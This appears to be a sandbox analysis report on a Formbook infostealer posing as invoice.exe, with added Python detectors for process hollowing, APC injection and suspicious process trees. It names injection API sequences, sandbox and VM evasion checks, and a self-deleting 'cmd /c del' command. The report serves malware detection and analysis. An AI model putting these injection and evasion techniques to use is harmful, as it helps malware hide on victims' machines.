          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C8280 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C8300 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C83B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C81D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C827A NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C82FB NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C83AA NtAllocateVirtualMemory,
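The wscript.exe listing above contains every primitive needed for process hollowing (NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) and for APC injection (NtOpenProcess, NtOpenThread, NtWriteVirtualMemory, NtQueueApcThread), which is what the "Sample uses process hollowing technique" and "Queues an APC in another process" verdicts rest on. Note that the sandbox records which stubs exist in the process, not the order in which they are called, so the listing alone cannot distinguish the two techniques. The block below is an added example, not code from the report or from the sample: an ordered-subsequence matcher over a native API trace. The trace format (pid, tab, API name, one call per line) and the call order in it are constructed for the example. Caveat: a user-mode hook trace can miss calls that go through a privately mapped copy of ntdll, so a kernel- or ETW-based trace is the reliable source for this kind of matching.

```python
# Added example (not part of the Joe Sandbox report or of the sample):
# match process-hollowing and APC-injection call sequences in an ordered
# native-API trace. The trace format and the call order are assumptions.
from typing import Dict, List

# Constructed trace, one "pid<TAB>api" line per call, in call order.
TRACE = """\
9\tNtCreateProcessEx
9\tNtGetContextThread
9\tNtUnmapViewOfSection
9\tNtAllocateVirtualMemory
9\tNtWriteVirtualMemory
9\tNtSetContextThread
9\tNtResumeThread
9\tNtOpenProcess
9\tNtWriteVirtualMemory
9\tNtQueueApcThread
9\tNtResumeThread
3\tNtCreateFile
3\tNtReadFile
3\tNtClose
"""

# Ordered subsequences; unrelated calls may occur in between the steps.
PATTERNS: Dict[str, List[str]] = {
    "process_hollowing": [
        "NtCreateProcessEx", "NtUnmapViewOfSection",
        "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread",
    ],
    "apc_injection": [
        "NtOpenProcess", "NtWriteVirtualMemory", "NtQueueApcThread",
    ],
}


def parse_trace(text: str) -> Dict[int, List[str]]:
    """Group API names by PID, preserving call order."""
    calls: Dict[int, List[str]] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, api = line.split("\t", 1)
        calls.setdefault(int(pid), []).append(api.strip())
    return calls


def is_subsequence(pattern: List[str], calls: List[str]) -> bool:
    """True if every step of pattern appears in calls, in that order."""
    it = iter(calls)
    return all(any(c == step for c in it) for step in pattern)


def match_patterns(calls: Dict[int, List[str]]) -> Dict[int, List[str]]:
    """Map each PID to the injection patterns its trace satisfies."""
    hits: Dict[int, List[str]] = {}
    for pid, seq in calls.items():
        found = [name for name, pat in PATTERNS.items()
                 if is_subsequence(pat, seq)]
        if found:
            hits[pid] = found
    return hits


if __name__ == "__main__":
    for pid, names in match_patterns(parse_trace(TRACE)).items():
        print(f"PID {pid}: {', '.join(names)}")
```

Order matters: NtResumeThread seen before NtWriteVirtualMemory does not satisfy the hollowing pattern, which is what keeps a benign CreateProcess/ResumeThread pair from firing.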
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_00802050
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_011794A8
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0117DCF4
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0117C148
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0117E218
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0117A748
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0117DCE8
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF0040
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF5930
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF1331
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF1340
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF0006
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF5558
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF5548
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF1A38
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF1A27
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF5B95
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF5B3B
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF5B5A
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF28F7
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_0041C803
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00408C6B
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00408C70
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_0041C598
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00D72050
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472D466
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467841F
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04731D55
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04660D20
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04732D07
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467D5E0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_047325DD
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04692581
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04686E30
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472D616
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04732EF7
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04731FF1
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04721002
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_047328EC
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046920A0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_047320A8
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0467B090
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04684120
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0466F900
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_047322AE
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04732B28
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0472DBD2
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0469EBB0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021CC803
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021B2FB0
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021B8C70
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021B8C6B
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021CC598
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021B2D90
          Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0466B150 appears 35 times
          Source: invoice.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: invoice.exe Binary or memory string: OriginalFilename vs invoice.exe
          Source: invoice.exe, 00000000.00000000.221487542.0000000000802000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exe, 00000000.00000002.253920792.00000000074A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll" vs invoice.exe
          Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll2 vs invoice.exe
          Source: invoice.exe Binary or memory string: OriginalFilename vs invoice.exe
          Source: invoice.exe, 00000003.00000000.241463096.0000000000D72000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs invoice.exe
          Source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs invoice.exe
          Source: invoice.exe Binary or memory string: OriginalFilenameCharTypeInfo.exeD vs invoice.exe
          Source: invoice.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: invoice.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@15/8
          Source: C:\Users\user\Desktop\invoice.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: invoice.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\invoice.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\invoice.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts (2 entries)
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: unknown Process created: C:\Users\user\Desktop\invoice.exe 'C:\Users\user\Desktop\invoice.exe'
          Source: C:\Users\user\Desktop\invoice.exe Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\invoice.exe Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
          Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
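Read as a tree, the "Process created" lines above say three things: invoice.exe launches a second copy of itself (the host that the unpacked Formbook image ends up in, matching the Yara hits on PID 3 at 0x400000); explorer.exe, which no process in this tree launched and which the report flags elsewhere for injected code, launches wscript.exe with no script argument; and that wscript.exe removes the original file through cmd.exe /c del. The last two lines repeat events already listed. The block below is an added example, not part of the report: it rebuilds that tree from the lines and flags the three relationships. The lines are copied from the report; the finding names and the "Windows binary started by explorer.exe with no arguments" heuristic are mine. A wscript.exe with no script to run is an anomaly on its own, and in a real investigation the explorer.exe parent means the true originator has to be recovered from the injection evidence rather than from the process tree.

```python
# Added example (not part of the report): derive the process tree from
# the "Process created" evidence lines and flag self-spawn, an argument-
# less Windows binary started by explorer.exe, and self-deletion of the
# original sample. Lines are copied from the report; finding names and
# heuristics are the author's own.
import re
from typing import List, Tuple

LINES = r"""
Source: unknown Process created: C:\Users\user\Desktop\invoice.exe 'C:\Users\user\Desktop\invoice.exe'
Source: C:\Users\user\Desktop\invoice.exe Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\invoice.exe Process created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'
"""

ROW = re.compile(
    r"Source: (?P<parent>\S+) Process created: (?P<child>\S+)(?: (?P<cmd>.*))?$"
)

Event = Tuple[str, str, str]  # parent path, child path, command line


def parse_events(text: str) -> List[Event]:
    """Parse evidence lines, dropping exact repeats (the report lists
    the same event under more than one signature)."""
    events: List[Event] = []
    seen = set()
    for line in text.strip().splitlines():
        line = line.strip()
        if not line or line in seen:
            continue
        seen.add(line)
        m = ROW.match(line)
        if m is None:
            raise ValueError(f"unrecognised line: {line!r}")
        events.append((m["parent"], m["child"], m["cmd"] or ""))
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].casefold()


def args_of(child: str, cmd: str) -> List[str]:
    """Command-line tokens after the executable itself (the report
    sometimes repeats the image path as argv[0], sometimes not)."""
    toks = cmd.split()
    if toks and toks[0].strip("'\"").casefold() == child.casefold():
        toks = toks[1:]
    return toks


def analyse(text: str) -> List[Tuple[str, str, str]]:
    """Return (finding, parent image, child image) triples."""
    events = parse_events(text)
    # The sample is whatever the sandbox itself ("unknown") started.
    sample = next((c for p, c, _ in events if p == "unknown"), "")
    findings: List[Tuple[str, str, str]] = []
    for parent, child, cmd in events:
        args = args_of(child, cmd)
        if parent.casefold() == child.casefold():
            findings.append(("self_spawn", basename(parent), basename(child)))
        if (basename(parent) == "explorer.exe"
                and child.casefold().startswith("c:\\windows\\")
                and not args):
            findings.append(("explorer_spawns_argless_system_binary",
                             basename(parent), basename(child)))
        if (basename(child) == "cmd.exe" and len(args) >= 3
                and [a.casefold() for a in args[:2]] == ["/c", "del"]
                and args[2].strip("'\"").casefold() == sample.casefold()):
            findings.append(("self_delete", basename(parent), basename(child)))
    return findings


if __name__ == "__main__":
    for finding, parent, child in analyse(LINES):
        print(f"{finding:<40} {parent} -> {child}")
```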
          Source: C:\Users\user\Desktop\invoice.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: invoice.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
          Source: Binary string: wscript.pdb source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_0081855F push dword ptr [esi+3Fh]; iretd
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_008192CB push FFFFFFD9h; iretd
          Source: C:\Users\user\Desktop\invoice.exe Code function: 0_2_02BF6A44 push A1FFFFFEh; ret
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_004161E2 push 00000062h; ret
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_004157E0 push esi; ret
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00D892CB push FFFFFFD9h; iretd
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00D8855F push dword ptr [esi+3Fh]; iretd
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021CB3C5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C61E2 push 00000062h; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021C57E0 push esi; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021CB41B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021CB412 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_021CB47C push eax; ret
          Source: initial sample Static PE information: section name: .text entropy: 7.55515603565
          Source: C:\Users\user\Desktop\invoice.exe Process information set: NOOPENFILEERRORBOX (39 identical entries)
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: invoice.exe PID: 1972, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\invoice.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
